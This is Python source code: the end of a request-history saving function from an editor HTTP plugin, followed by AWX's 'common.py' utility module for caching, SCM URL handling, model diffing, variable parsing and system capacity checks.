            meta = 'download: {}'.format(req.skwargs['filename'] or './')
        tabname = req.skwargs.get('tabname')
        method, url = res.request.method, res.url

        file = self.view.settings().get('requester.file', None)
        _, original_request = self.view.settings().get('requester.binding_info', [None, None])
        if original_request is not None and prepend_library(original_request) == req.request:
            original_request = None  # don't waste space in hist file if these requests are identical
        key = '{};;{}'.format(req.request, file) if file else req.request
        if key in rh:
            rh.pop(key, None)  # remove duplicate requests (re-inserting moves it to newest)
        rh[key] = {
            'ts': int(time()),
            'env_string': self.view.settings().get('requester.env_string', None),
            'file': file,
            'method': method,
            'meta': meta,
            'url': url,
            'code': res.status_code,
            'request': req.request,
            'original_request': original_request,
            'tabname': tabname,
        }

    # remove oldest requests if number of requests has exceeded `history_max_entries`
    history_max_entries = self.config.get('history_max_entries', 250)
    to_delete = len(rh) - history_max_entries
    if to_delete > 0:
        keys = []
        iter_ = iter(rh.keys())
        for _ in range(to_delete):
            try:
                keys.append(next(iter_))
            except StopIteration:
                break
        for key in keys:
            try:
                del rh[key]
            except KeyError:
                pass
    write_json_file(rh, history_path)
def write_json_file(data, path):
    """Safely write `data` to file at `path`.

    Writes to a temp file first so no data is lost if serialization fails,
    keeps the previous contents in a `.bkp` file, then swaps the temp file
    into place. Uses `os.replace` instead of `os.rename` because `os.rename`
    raises on Windows when the destination (e.g. a `.bkp` from a previous
    run) already exists; on POSIX the two behave identically here.
    https://stackoverflow.com/questions/1812115/how-to-safely-write-to-a-file
    """
    path_temp = path + '.tmp'
    path_backup = path + '.bkp'
    with open(path_temp, 'w') as f:
        f.write(json.dumps(data))  # write to temp file to ensure no data loss if exception raised here
    os.replace(path, path_backup)  # create backup file in case swap is unsuccessful
    os.replace(path_temp, path)
|
common.py | # Copyright (c) 2015 Ansible, Inc.
# All Rights Reserved.
# Python
import json
import yaml
import logging
import os
import re
import subprocess
import stat
import urllib.parse
import threading
import contextlib
import tempfile
import psutil
from functools import reduce, wraps
from decimal import Decimal
# Django
from django.core.exceptions import ObjectDoesNotExist, FieldDoesNotExist
from django.utils.translation import ugettext_lazy as _
from django.utils.functional import cached_property
from django.db.models.fields.related import ForeignObjectRel, ManyToManyField
from django.db.models.fields.related_descriptors import (
ForwardManyToOneDescriptor,
ManyToManyDescriptor
)
from django.db.models.query import QuerySet
from django.db.models import Q
# Django REST Framework
from rest_framework.exceptions import ParseError
from django.utils.encoding import smart_str
from django.utils.text import slugify
from django.apps import apps
# Module-level logger for AWX utility helpers.
logger = logging.getLogger('awx.main.utils')

# Public API of this module: `from awx.main.utils.common import *` pulls in
# exactly these names.
__all__ = [
    'get_object_or_400', 'camelcase_to_underscore', 'underscore_to_camelcase', 'memoize',
    'memoize_delete', 'get_ansible_version', 'get_ssh_version', 'get_licenser',
    'get_awx_version', 'update_scm_url', 'get_type_for_model', 'get_model_for_type',
    'copy_model_by_class', 'region_sorting', 'copy_m2m_relationships',
    'prefetch_page_capabilities', 'to_python_boolean', 'ignore_inventory_computed_fields',
    'ignore_inventory_group_removal', '_inventory_updates', 'get_pk_from_dict', 'getattrd',
    'getattr_dne', 'NoDefaultProvided', 'get_current_apps', 'set_current_apps',
    'extract_ansible_vars', 'get_search_fields', 'get_system_task_capacity',
    'get_cpu_capacity', 'get_mem_capacity', 'wrap_args_with_proot', 'build_proot_temp_dir',
    'check_proot_installed', 'model_to_dict', 'NullablePromptPseudoField',
    'model_instance_diff', 'parse_yaml_or_json', 'RequireDebugTrueOrTest',
    'has_model_field_prefetched', 'set_environ', 'IllegalArgumentError',
    'get_custom_venv_choices', 'get_external_account', 'task_manager_bulk_reschedule',
    'schedule_task_manager', 'classproperty', 'create_temporary_fifo', 'truncate_stdout',
]
def get_object_or_400(klass, *args, **kwargs):
    '''
    Return a single object from the given model or queryset based on the query
    params, otherwise raise an exception that will return in a 400 response.
    '''
    from django.shortcuts import _get_queryset
    queryset = _get_queryset(klass)
    try:
        return queryset.get(*args, **kwargs)
    except (queryset.model.DoesNotExist, queryset.model.MultipleObjectsReturned) as e:
        # zero or multiple matches both translate to a 400 response
        raise ParseError(*e.args)
def to_python_boolean(value, allow_none=False):
    '''
    Coerce `value` to True/False (or None when `allow_none` is set),
    raising ValueError for anything unrecognized.
    '''
    value = str(value)
    lowered = value.lower()
    if lowered in ('true', '1', 't'):
        return True
    if lowered in ('false', '0', 'f'):
        return False
    if allow_none and lowered in ('none', 'null'):
        return None
    raise ValueError(_(u'Unable to convert "%s" to boolean') % value)
def region_sorting(region):
    # Sort key for (id, name) region tuples: 'all' sorts first, US regions
    # next, everything else alphabetically at the end.
    # (python3's removal of sorted(cmp=...) is why this exists.)
    name = region[1].lower()
    if name == 'all':
        return ''
    if name.startswith('us'):
        return region[1]
    return 'ZZZ' + str(region[1])
def camelcase_to_underscore(s):
    '''
    Convert CamelCase names to lowercase_with_underscore.
    '''
    # insert '_' before each capital that starts a new word
    underscored = re.sub(r'(((?<=[a-z])[A-Z])|([A-Z](?![A-Z]|$)))', r'_\1', s)
    return underscored.lower().strip('_')
def underscore_to_camelcase(s):
    '''
    Convert lowercase_with_underscore names to CamelCase.
    '''
    # empty segments (consecutive underscores) are kept as literal '_'
    parts = (chunk.capitalize() or '_' for chunk in s.split('_'))
    return ''.join(parts)
class RequireDebugTrueOrTest(logging.Filter):
    '''
    Logging filter to output when in DEBUG mode or running tests.
    '''

    def filter(self, record):
        # Imported lazily so the filter can be instantiated before Django
        # settings are configured.
        from django.conf import settings
        return settings.DEBUG or settings.IS_TESTING()
class IllegalArgumentError(ValueError):
    """Raised for invalid argument combinations (e.g. `memoize` rejects
    `cache_key` together with `track_function`)."""
    pass
def get_memoize_cache():
    """Return the default Django cache used by `memoize`/`memoize_delete`.

    Imported lazily so this module can be imported before Django settings
    are configured.
    """
    from django.core.cache import cache
    return cache
def memoize(ttl=60, cache_key=None, track_function=False, cache=None):
    '''
    Decorator to wrap a function and cache its result.

    :param ttl: seconds a cached value stays valid
    :param cache_key: explicit cache key; mutually exclusive with `track_function`
    :param track_function: when True, all results for the function are stored
        under a single key (the slugified function name) as a dict keyed by
        the call arguments — this is what `memoize_delete` clears
    :param cache: cache backend; defaults to the Django cache
    :raises IllegalArgumentError: if both `cache_key` and `track_function` given
    '''
    if cache_key and track_function:
        raise IllegalArgumentError("Can not specify cache_key when track_function is True")
    cache = cache or get_memoize_cache()

    def memoize_decorator(f):
        @wraps(f)
        def _memoizer(*args, **kwargs):
            if track_function:
                # one cache entry per function, holding a dict keyed by args
                cache_dict_key = slugify('%r %r' % (args, kwargs))
                key = slugify("%s" % f.__name__)
                cache_dict = cache.get(key) or dict()
                if cache_dict_key not in cache_dict:
                    value = f(*args, **kwargs)
                    cache_dict[cache_dict_key] = value
                    cache.set(key, cache_dict, ttl)
                else:
                    value = cache_dict[cache_dict_key]
            else:
                # one cache entry per (function, args) combination
                key = cache_key or slugify('%s %r %r' % (f.__name__, args, kwargs))
                value = cache.get(key)
                if value is None:
                    value = f(*args, **kwargs)
                    cache.set(key, value, ttl)
            return value
        return _memoizer
    return memoize_decorator
def memoize_delete(function_name):
    """Drop the cached results stored under `function_name` — the key format
    used by `memoize(track_function=True)`."""
    cache = get_memoize_cache()
    return cache.delete(function_name)
def _get_ansible_version(ansible_path):
'''
Return Ansible version installed.
Ansible path needs to be provided to account for custom virtual environments
'''
try:
proc = subprocess.Popen([ansible_path, '--version'],
stdout=subprocess.PIPE)
result = smart_str(proc.communicate()[0])
return result.split('\n')[0].replace('ansible', '').strip()
except Exception:
return 'unknown'
@memoize()
def get_ansible_version():
    """Return the version of the system-wide `ansible` binary (cached)."""
    return _get_ansible_version('ansible')
@memoize()
def get_ssh_version():
    '''
    Return SSH version installed.
    '''
    try:
        # `ssh -V` writes its banner (e.g. "OpenSSH_7.4p1, ...") to stderr
        proc = subprocess.Popen(['ssh', '-V'],
                                stderr=subprocess.PIPE)
        result = smart_str(proc.communicate()[1])
        # take text after the first '_' of the first token, e.g. "7.4p1,"
        return result.split(" ")[0].split("_")[1]
    except Exception:
        return 'unknown'
def get_awx_version():
    '''
    Return AWX version as reported by setuptools.
    '''
    from awx import __version__
    try:
        import pkg_resources
        return pkg_resources.require('awx')[0].version
    except Exception:
        # setuptools metadata unavailable; fall back to the package constant
        return __version__
class StubLicense(object):
    """Fallback licenser used when the `tower_license` package is absent:
    reports an open license with every feature enabled."""

    features = {
        name: True
        for name in (
            'activity_streams',
            'ha',
            'ldap',
            'multiple_organizations',
            'surveys',
            'system_tracking',
            'rebranding',
            'enterprise_auth',
            'workflows',
        )
    }

    def validate(self):
        """Return a license payload marking this install as open/compliant."""
        return {
            'license_key': 'OPEN',
            'valid_key': True,
            'compliant': True,
            'features': self.features,
            'license_type': 'open',
        }
def get_licenser(*args, **kwargs):
    """Return a TowerLicense when the `tower_license` package is importable,
    otherwise fall back to the permissive `StubLicense`.

    NOTE(review): the except wraps construction too, so an ImportError raised
    while *instantiating* TowerLicense also degrades to StubLicense.
    """
    try:
        from tower_license import TowerLicense
        return TowerLicense(*args, **kwargs)
    except ImportError:
        return StubLicense(*args, **kwargs)
def update_scm_url(scm_type, url, username=True, password=True,
                   check_special_cases=True, scp_format=False):
    '''
    Update the given SCM URL to add/replace/remove the username/password. When
    username/password is True, preserve existing username/password, when
    False (None, '', etc.), remove any existing username/password, otherwise
    replace username/password. Also validates the given URL.

    :param scm_type: one of 'git', 'hg', 'svn', 'insights'
    :param scp_format: when True, SCP-style git URLs are accepted and the
        result is converted back to SCP form at the end
    :raises ValueError: for unsupported types, schemes, or malformed URLs
    '''
    # Handle all of the URL formats supported by the SCM systems:
    # git: https://www.kernel.org/pub/software/scm/git/docs/git-clone.html#URLS
    # hg: http://www.selenic.com/mercurial/hg.1.html#url-paths
    # svn: http://svnbook.red-bean.com/en/1.7/svn-book.html#svn.advanced.reposurls
    if scm_type not in ('git', 'hg', 'svn', 'insights'):
        raise ValueError(_('Unsupported SCM type "%s"') % str(scm_type))
    if not url.strip():
        return ''
    parts = urllib.parse.urlsplit(url)
    try:
        # accessing .port raises ValueError when the port is non-numeric
        parts.port
    except ValueError:
        raise ValueError(_('Invalid %s URL') % scm_type)
    if parts.scheme == 'git+ssh' and not scp_format:
        raise ValueError(_('Unsupported %s URL') % scm_type)

    if '://' not in url:
        # Handle SCP-style URLs for git (e.g. [user@]host.xz:path/to/repo.git/).
        if scm_type == 'git' and ':' in url:
            if '@' in url:
                userpass, hostpath = url.split('@', 1)
            else:
                userpass, hostpath = '', url
            if hostpath.count(':') > 1:
                raise ValueError(_('Invalid %s URL') % scm_type)
            host, path = hostpath.split(':', 1)
            #if not path.startswith('/') and not path.startswith('~/'):
            #    path = '~/%s' % path
            #if path.startswith('/'):
            #    path = path.lstrip('/')
            hostpath = '/'.join([host, path])
            modified_url = '@'.join(filter(None, [userpass, hostpath]))
            # git+ssh scheme identifies URLs that should be converted back to
            # SCP style before passed to git module.
            parts = urllib.parse.urlsplit('git+ssh://%s' % modified_url)
        # Handle local paths specified without file scheme (e.g. /path/to/foo).
        # Only supported by git and hg.
        elif scm_type in ('git', 'hg'):
            if not url.startswith('/'):
                parts = urllib.parse.urlsplit('file:///%s' % url)
            else:
                parts = urllib.parse.urlsplit('file://%s' % url)
        else:
            raise ValueError(_('Invalid %s URL') % scm_type)

    # Validate that scheme is valid for given scm_type.
    scm_type_schemes = {
        'git': ('ssh', 'git', 'git+ssh', 'http', 'https', 'ftp', 'ftps', 'file'),
        'hg': ('http', 'https', 'ssh', 'file'),
        'svn': ('http', 'https', 'svn', 'svn+ssh', 'file'),
        'insights': ('http', 'https')
    }
    if parts.scheme not in scm_type_schemes.get(scm_type, ()):
        raise ValueError(_('Unsupported %s URL') % scm_type)
    if parts.scheme == 'file' and parts.netloc not in ('', 'localhost'):
        raise ValueError(_('Unsupported host "%s" for file:// URL') % (parts.netloc))
    elif parts.scheme != 'file' and not parts.netloc:
        raise ValueError(_('Host is required for %s URL') % parts.scheme)
    # Resolve the username/password to embed: True = keep existing,
    # falsy = strip, anything else = replace.
    if username is True:
        netloc_username = parts.username or ''
    elif username:
        netloc_username = username
    else:
        netloc_username = ''
    if password is True:
        netloc_password = parts.password or ''
    elif password:
        netloc_password = password
    else:
        netloc_password = ''

    # Special handling for github/bitbucket SSH URLs.
    if check_special_cases:
        special_git_hosts = ('github.com', 'bitbucket.org', 'altssh.bitbucket.org')
        if scm_type == 'git' and parts.scheme.endswith('ssh') and parts.hostname in special_git_hosts and netloc_username != 'git':
            raise ValueError(_('Username must be "git" for SSH access to %s.') % parts.hostname)
        if scm_type == 'git' and parts.scheme.endswith('ssh') and parts.hostname in special_git_hosts and netloc_password:
            #raise ValueError('Password not allowed for SSH access to %s.' % parts.hostname)
            netloc_password = ''
        special_hg_hosts = ('bitbucket.org', 'altssh.bitbucket.org')
        if scm_type == 'hg' and parts.scheme == 'ssh' and parts.hostname in special_hg_hosts and netloc_username != 'hg':
            raise ValueError(_('Username must be "hg" for SSH access to %s.') % parts.hostname)
        if scm_type == 'hg' and parts.scheme == 'ssh' and netloc_password:
            #raise ValueError('Password not supported for SSH with Mercurial.')
            netloc_password = ''

    # Rebuild the netloc as [user[:pass]@]host[:port] with escaping.
    if netloc_username and parts.scheme != 'file' and scm_type != "insights":
        netloc = u':'.join([urllib.parse.quote(x,safe='') for x in (netloc_username, netloc_password) if x])
    else:
        netloc = u''
    netloc = u'@'.join(filter(None, [netloc, parts.hostname]))
    if parts.port:
        netloc = u':'.join([netloc, str(parts.port)])
    new_url = urllib.parse.urlunsplit([parts.scheme, netloc, parts.path,
                                       parts.query, parts.fragment])
    if scp_format and parts.scheme == 'git+ssh':
        # convert back to SCP style: drop the scheme, first '/' becomes ':'
        new_url = new_url.replace('git+ssh://', '', 1).replace('/', ':', 1)
    return new_url
def get_allowed_fields(obj, serializer_mapping):
    """Return the field names eligible for activity-stream recording on `obj`.

    Uses the mapped serializer's writable fields when available, otherwise
    all model fields; always strips the per-model exclusion list.
    """
    if serializer_mapping is not None and obj.__class__ in serializer_mapping:
        serializer_fields = serializer_mapping[obj.__class__]().fields
        allowed_fields = [
            name for name in serializer_fields if not serializer_fields[name].read_only
        ] + ['id']
    else:
        allowed_fields = [field.name for field in obj._meta.fields]

    # Fields whose churn would flood the activity stream or leak secrets.
    exclusions_by_model = {
        'user': ['last_login'],
        'oauth2accesstoken': ['last_used'],
        'oauth2application': ['client_secret']
    }
    blacklist = exclusions_by_model.get(obj._meta.model_name, [])
    if blacklist:
        allowed_fields = [name for name in allowed_fields if name not in blacklist]
    return allowed_fields
def _convert_model_field_for_display(obj, field_name, password_fields=None):
    """Return a loggable representation of `obj.<field_name>`.

    Password/encrypted values are masked as 'hidden', lists/dicts are JSON
    encoded, and anything that isn't bool/int/None is coerced to text.
    """
    # NOTE: Careful modifying the value of field_val, as it could modify
    # underlying model object field value also.
    try:
        field_val = getattr(obj, field_name, None)
    except ObjectDoesNotExist:
        # related object was deleted; fall back to the raw FK id
        return '<missing {}>-{}'.format(obj._meta.verbose_name, getattr(obj, '{}_id'.format(field_name)))
    if password_fields is None:
        password_fields = set(getattr(type(obj), 'PASSWORD_FIELDS', [])) | set(['password'])
    if field_name in password_fields or (
        isinstance(field_val, str) and
        field_val.startswith('$encrypted$')
    ):
        return u'hidden'
    if hasattr(obj, 'display_%s' % field_name):
        # model provides a display helper for this field; prefer its output
        field_val = getattr(obj, 'display_%s' % field_name)()
    if isinstance(field_val, (list, dict)):
        try:
            field_val = json.dumps(field_val, ensure_ascii=False)
        except Exception:
            pass  # best-effort; fall through to smart_str below
    if type(field_val) not in (bool, int, type(None)):
        field_val = smart_str(field_val)
    return field_val
def model_instance_diff(old, new, serializer_mapping=None):
    """
    Calculate the differences between two model instances. One of the instances may be None (i.e., a newly
    created model or deleted model). This will cause all fields with a value to have changed (from None).
    serializer_mapping are used to determine read-only fields.
    When provided, read-only fields will not be included in the resulting dictionary

    Returns a dict of {field: (old_display, new_display)} or None when nothing changed.
    """
    from django.db.models import Model
    if not(old is None or isinstance(old, Model)):
        raise TypeError('The supplied old instance is not a valid model instance.')
    if not(new is None or isinstance(new, Model)):
        raise TypeError('The supplied new instance is not a valid model instance.')
    # password fields are masked per-instance type by _convert_model_field_for_display
    old_password_fields = set(getattr(type(old), 'PASSWORD_FIELDS', [])) | set(['password'])
    new_password_fields = set(getattr(type(new), 'PASSWORD_FIELDS', [])) | set(['password'])

    diff = {}
    allowed_fields = get_allowed_fields(new, serializer_mapping)
    for field in allowed_fields:
        old_value = getattr(old, field, None)
        new_value = getattr(new, field, None)
        if old_value != new_value:
            diff[field] = (
                _convert_model_field_for_display(old, field, password_fields=old_password_fields),
                _convert_model_field_for_display(new, field, password_fields=new_password_fields),
            )
    if len(diff) == 0:
        # callers treat None as "no changes"
        diff = None
    return diff
def model_to_dict(obj, serializer_mapping=None):
    """
    Serialize a model instance to a dictionary as best as possible
    serializer_mapping are used to determine read-only fields.
    When provided, read-only fields will not be included in the resulting dictionary
    """
    password_fields = set(getattr(type(obj), 'PASSWORD_FIELDS', [])) | set(['password'])
    return {
        field_name: _convert_model_field_for_display(obj, field_name, password_fields=password_fields)
        for field_name in get_allowed_fields(obj, serializer_mapping)
    }
class CharPromptDescriptor:
    """Class used for identifying nullable launch config fields from class
    ex. Schedule.limit
    """
    def __init__(self, field):
        # the NullablePromptPseudoField this descriptor stands in for
        self.field = field
class NullablePromptPseudoField:
    """
    Interface for pseudo-property stored in `char_prompts` dict
    Used in LaunchTimeConfig and submodels, defined here to avoid circular imports
    """
    def __init__(self, field_name):
        # key under which the value lives in the instance's `char_prompts` dict
        self.field_name = field_name

    @cached_property
    def field_descriptor(self):
        # sentinel object so callers (see copy_model_by_class) can recognize
        # these pseudo-fields when inspecting the class
        return CharPromptDescriptor(self)

    def __get__(self, instance, type=None):
        if instance is None:
            # for inspection on class itself
            return self.field_descriptor
        return instance.char_prompts.get(self.field_name, None)

    def __set__(self, instance, value):
        # setting None/{} removes the key entirely instead of storing a null
        if value in (None, {}):
            instance.char_prompts.pop(self.field_name, None)
        else:
            instance.char_prompts[self.field_name] = value
def copy_model_by_class(obj1, Class2, fields, kwargs):
    '''
    Creates a new unsaved object of type Class2 using the fields from obj1
    values in kwargs can override obj1

    :param fields: field names to copy; dispatch per field depends on the
        descriptor found on Class2 (FK, char-prompt pseudo-field, M2M, plain)
    '''
    create_kwargs = {}
    for field_name in fields:
        descriptor = getattr(Class2, field_name)
        if isinstance(descriptor, ForwardManyToOneDescriptor):  # ForeignKey
            # Foreign keys can be specified as field_name or field_name_id.
            id_field_name = '%s_id' % field_name
            if field_name in kwargs:
                value = kwargs[field_name]
            elif id_field_name in kwargs:
                value = kwargs[id_field_name]
            else:
                value = getattr(obj1, id_field_name)
            if hasattr(value, 'id'):
                # a model instance was given; store just its pk
                value = value.id
            create_kwargs[id_field_name] = value
        elif isinstance(descriptor, CharPromptDescriptor):
            # difficult case of copying one launch config to another launch config
            new_val = None
            if field_name in kwargs:
                new_val = kwargs[field_name]
            elif hasattr(obj1, 'char_prompts'):
                if field_name in obj1.char_prompts:
                    new_val = obj1.char_prompts[field_name]
            elif hasattr(obj1, field_name):
                # extremely rare case where a template spawns a launch config - sliced jobs
                new_val = getattr(obj1, field_name)
            if new_val is not None:
                create_kwargs.setdefault('char_prompts', {})
                create_kwargs['char_prompts'][field_name] = new_val
        elif isinstance(descriptor, ManyToManyDescriptor):
            continue  # not copied in this method
        elif field_name in kwargs:
            if field_name == 'extra_vars' and isinstance(kwargs[field_name], dict):
                # extra_vars are stored serialized
                create_kwargs[field_name] = json.dumps(kwargs['extra_vars'])
            elif not isinstance(Class2._meta.get_field(field_name), (ForeignObjectRel, ManyToManyField)):
                create_kwargs[field_name] = kwargs[field_name]
        elif hasattr(obj1, field_name):
            create_kwargs[field_name] = getattr(obj1, field_name)

    # Apply class-specific extra processing for origination of unified jobs
    if hasattr(obj1, '_update_unified_job_kwargs') and obj1.__class__ != Class2:
        new_kwargs = obj1._update_unified_job_kwargs(create_kwargs, kwargs)
    else:
        new_kwargs = create_kwargs

    return Class2(**new_kwargs)
def copy_m2m_relationships(obj1, obj2, fields, kwargs=None):
    '''
    In-place operation.
    Given two saved objects, copies related objects from obj1
    to obj2 to field of same name, if field occurs in `fields`

    :param kwargs: optional per-field overrides; a plain collection is added
        directly, a ManyRelatedManager replaces the source queryset
    '''
    for field_name in fields:
        if hasattr(obj1, field_name):
            try:
                field_obj = obj1._meta.get_field(field_name)
            except FieldDoesNotExist:
                continue
            if isinstance(field_obj, ManyToManyField):
                # Many to Many can be specified as field_name
                src_field_value = getattr(obj1, field_name)
                if kwargs and field_name in kwargs:
                    override_field_val = kwargs[field_name]
                    if isinstance(override_field_val, (set, list, QuerySet)):
                        # explicit collection: add it and skip the copy below
                        getattr(obj2, field_name).add(*override_field_val)
                        continue
                    if override_field_val.__class__.__name__ == 'ManyRelatedManager':
                        src_field_value = override_field_val
                dest_field = getattr(obj2, field_name)
                # copy by pk to avoid re-fetching full model instances
                dest_field.add(*list(src_field_value.all().values_list('id', flat=True)))
def get_type_for_model(model):
    '''
    Return type name for a given model class.
    '''
    concrete_opts = model._meta.concrete_model._meta
    return camelcase_to_underscore(concrete_opts.object_name)
def get_model_for_type(type_name):
    '''
    Return model class for a given type name.
    '''
    model_str = underscore_to_camelcase(type_name)
    # User lives in django.contrib.auth; everything else is an awx.main model
    use_app = 'auth' if model_str == 'User' else 'main'
    return apps.get_model(use_app, model_str)
def prefetch_page_capabilities(model, page, prefetch_list, user):
    '''
    Given a `page` list of objects, a nested dictionary of user_capabilities
    are returned by id, ex.
    {
        4: {'edit': True, 'start': True},
        6: {'edit': False, 'start': False}
    }
    Each capability is produced for all items in the page in a single query

    Examples of prefetch language:
    prefetch_list = ['admin', 'execute']
      --> prefetch the admin (edit) and execute (start) permissions for
          items in list for current user
    prefetch_list = ['inventory.admin']
      --> prefetch the related inventory FK permissions for current user,
          and put it into the object's cache
    prefetch_list = [{'copy': ['inventory.admin', 'project.admin']}]
      --> prefetch logical combination of admin permission to inventory AND
          project, put into cache dictionary as "copy"
    '''
    page_ids = [obj.id for obj in page]
    mapping = {}
    for obj in page:
        mapping[obj.id] = {}

    for prefetch_entry in prefetch_list:
        display_method = None
        if type(prefetch_entry) is dict:
            # dict entry names the output key explicitly, e.g. {'copy': [...]}
            display_method = list(prefetch_entry.keys())[0]
            paths = prefetch_entry[display_method]
        else:
            paths = prefetch_entry
        if type(paths) is not list:
            paths = [paths]

        # Build the query for accessible_objects according the user & role(s)
        filter_args = []
        for role_path in paths:
            if '.' in role_path:
                # role on a related model, e.g. 'inventory.admin'
                res_path = '__'.join(role_path.split('.')[:-1])
                role_type = role_path.split('.')[-1]
                parent_model = model
                for subpath in role_path.split('.')[:-1]:
                    parent_model = parent_model._meta.get_field(subpath).related_model
                # a null relation is treated as accessible
                filter_args.append(Q(
                    Q(**{'%s__pk__in' % res_path: parent_model.accessible_pk_qs(user, '%s_role' % role_type)}) |
                    Q(**{'%s__isnull' % res_path: True})))
            else:
                role_type = role_path
                filter_args.append(Q(**{'pk__in': model.accessible_pk_qs(user, '%s_role' % role_type)}))

        if display_method is None:
            # Role name translation to UI names for methods
            display_method = role_type
            if role_type == 'admin':
                display_method = 'edit'
            elif role_type in ['execute', 'update']:
                display_method = 'start'

        # Union that query with the list of items on page
        filter_args.append(Q(pk__in=page_ids))
        ids_with_role = set(model.objects.filter(*filter_args).values_list('pk', flat=True))

        # Save data item-by-item
        for obj in page:
            mapping[obj.pk][display_method] = bool(obj.pk in ids_with_role)
    return mapping
def validate_vars_type(vars_obj):
    """Raise AssertionError (with a readable type name) unless `vars_obj`
    is a dictionary."""
    if isinstance(vars_obj, dict):
        return
    vars_type = type(vars_obj)
    data_type = vars_type.__name__ if hasattr(vars_type, '__name__') else str(vars_type)
    raise AssertionError(
        _('Input type `{data_type}` is not a dictionary').format(
            data_type=data_type)
    )
def parse_yaml_or_json(vars_str, silent_failure=True):
    '''
    Attempt to parse a string of variables.
    First, with JSON parser, if that fails, then with PyYAML.
    If both attempts fail, return an empty dictionary if `silent_failure`
    is True, re-raise combination error if `silent_failure` if False.
    '''
    if isinstance(vars_str, dict):
        # already parsed; pass through untouched
        return vars_str
    elif isinstance(vars_str, str) and vars_str == '""':
        return {}

    try:
        vars_dict = json.loads(vars_str)
        validate_vars_type(vars_dict)
    except (ValueError, TypeError, AssertionError) as json_err:
        # JSON failed; fall back to YAML (which is a superset of JSON)
        try:
            vars_dict = yaml.safe_load(vars_str)
            # Can be None if '---'
            if vars_dict is None:
                vars_dict = {}
            validate_vars_type(vars_dict)
            if not silent_failure:
                # is valid YAML, check that it is compatible with JSON
                try:
                    json.dumps(vars_dict)
                except (ValueError, TypeError, AssertionError) as json_err2:
                    raise ParseError(_(
                        'Variables not compatible with JSON standard (error: {json_error})').format(
                            json_error=str(json_err2)))
        except (yaml.YAMLError, TypeError, AttributeError, AssertionError) as yaml_err:
            if silent_failure:
                return {}
            # surface both parser errors so the caller can see what went wrong
            raise ParseError(_(
                'Cannot parse as JSON (error: {json_error}) or '
                'YAML (error: {yaml_error}).').format(
                    json_error=str(json_err), yaml_error=str(yaml_err)))
    return vars_dict
def get_cpu_capacity():
    """Return a (cpu_count, fork_capacity) tuple derived from CPU count.

    Absolute overrides (env var, then setting) short-circuit with cpu=0;
    otherwise capacity is cpu_count * forks-per-cpu (default 4).
    """
    from django.conf import settings
    settings_forkcpu = getattr(settings, 'SYSTEM_TASK_FORKS_CPU', None)
    env_forkcpu = os.getenv('SYSTEM_TASK_FORKS_CPU', None)
    settings_abscpu = getattr(settings, 'SYSTEM_TASK_ABS_CPU', None)
    env_abscpu = os.getenv('SYSTEM_TASK_ABS_CPU', None)

    if env_abscpu is not None:
        return 0, int(env_abscpu)
    if settings_abscpu is not None:
        return 0, int(settings_abscpu)

    cpu = psutil.cpu_count()
    # first truthy override wins; default to 4 forks per cpu
    forkcpu = next((int(v) for v in (env_forkcpu, settings_forkcpu) if v), 4)
    return (cpu, cpu * forkcpu)
def get_mem_capacity():
    """Return a (total_mem_bytes, fork_capacity) tuple derived from memory.

    Absolute overrides (env var, then setting) short-circuit with mem=0;
    otherwise capacity is (MiB of RAM - 2048) / MiB-per-fork (default 100),
    never less than 1.
    """
    from django.conf import settings
    settings_forkmem = getattr(settings, 'SYSTEM_TASK_FORKS_MEM', None)
    env_forkmem = os.getenv('SYSTEM_TASK_FORKS_MEM', None)
    settings_absmem = getattr(settings, 'SYSTEM_TASK_ABS_MEM', None)
    env_absmem = os.getenv('SYSTEM_TASK_ABS_MEM', None)

    if env_absmem is not None:
        return 0, int(env_absmem)
    if settings_absmem is not None:
        return 0, int(settings_absmem)

    # first truthy override wins; default to 100 MiB per fork
    forkmem = next((int(v) for v in (env_forkmem, settings_forkmem) if v), 100)
    mem = psutil.virtual_memory().total
    return (mem, max(1, ((mem // 1024 // 1024) - 2048) // forkmem))
def get_system_task_capacity(scale=Decimal(1.0), cpu_capacity=None, mem_capacity=None):
    '''
    Measure system memory and use it as a baseline for determining the system's capacity

    Capacity is min(mem, cpu) plus `scale` times the gap up to max(mem, cpu);
    explicit env/settings overrides win outright.
    '''
    from django.conf import settings
    settings_forks = getattr(settings, 'SYSTEM_TASK_FORKS_CAPACITY', None)
    env_forks = os.getenv('SYSTEM_TASK_FORKS_CAPACITY', None)
    if env_forks:
        return int(env_forks)
    if settings_forks:
        return int(settings_forks)

    cpu_cap = cpu_capacity if cpu_capacity is not None else get_cpu_capacity()[1]
    mem_cap = mem_capacity if mem_capacity is not None else get_mem_capacity()[1]
    low, high = sorted((mem_cap, cpu_cap))
    return low + (high - low) * scale
# Per-thread flags read by the context managers below: `_inventory_updates`
# suppresses inventory side effects, `_task_manager` batches task-manager
# scheduling within a thread.
_inventory_updates = threading.local()
_task_manager = threading.local()
@contextlib.contextmanager
def ignore_inventory_computed_fields():
    '''
    Context manager to ignore updating inventory computed fields.
    '''
    saved = getattr(_inventory_updates, 'is_updating', False)
    _inventory_updates.is_updating = True
    try:
        yield
    finally:
        # Restore whatever the flag was before entry (supports nesting).
        _inventory_updates.is_updating = saved
def _schedule_task_manager():
    """Submit a task-manager run, deferred until the current DB transaction commits."""
    from awx.main.scheduler.tasks import run_task_manager
    from django.db import connection
    # runs right away if not in transaction
    connection.on_commit(lambda: run_task_manager.delay())
@contextlib.contextmanager
def task_manager_bulk_reschedule():
    """Context manager to avoid submitting task multiple times.

    While active, schedule_task_manager() only records the request; a single
    submission is made on exit if anything inside the block asked for one.
    """
    saved_flag = getattr(_task_manager, 'bulk_reschedule', False)
    saved_need = getattr(_task_manager, 'needs_scheduling', False)
    _task_manager.bulk_reschedule = True
    _task_manager.needs_scheduling = False
    try:
        yield
    finally:
        _task_manager.bulk_reschedule = saved_flag
        if _task_manager.needs_scheduling:
            # Something inside the block requested a run; submit exactly once.
            _schedule_task_manager()
        _task_manager.needs_scheduling = saved_need
def schedule_task_manager():
    """Submit a task-manager run now, or defer it inside a bulk-reschedule block."""
    if not getattr(_task_manager, 'bulk_reschedule', False):
        _schedule_task_manager()
        return
    # Batched mode: record the request; task_manager_bulk_reschedule()
    # performs the single submission on exit.
    _task_manager.needs_scheduling = True
@contextlib.contextmanager
def ignore_inventory_group_removal():
    '''
    Context manager to ignore moving groups/hosts when group is deleted.
    '''
    saved = getattr(_inventory_updates, 'is_removing', False)
    _inventory_updates.is_removing = True
    try:
        yield
    finally:
        # Restore the previous flag value (supports nesting).
        _inventory_updates.is_removing = saved
@contextlib.contextmanager
def set_environ(**environ):
    '''
    Temporarily set the process environment variables.

    >>> with set_environ(FOO='BAR'):
    ...     assert os.environ['FOO'] == 'BAR'
    '''
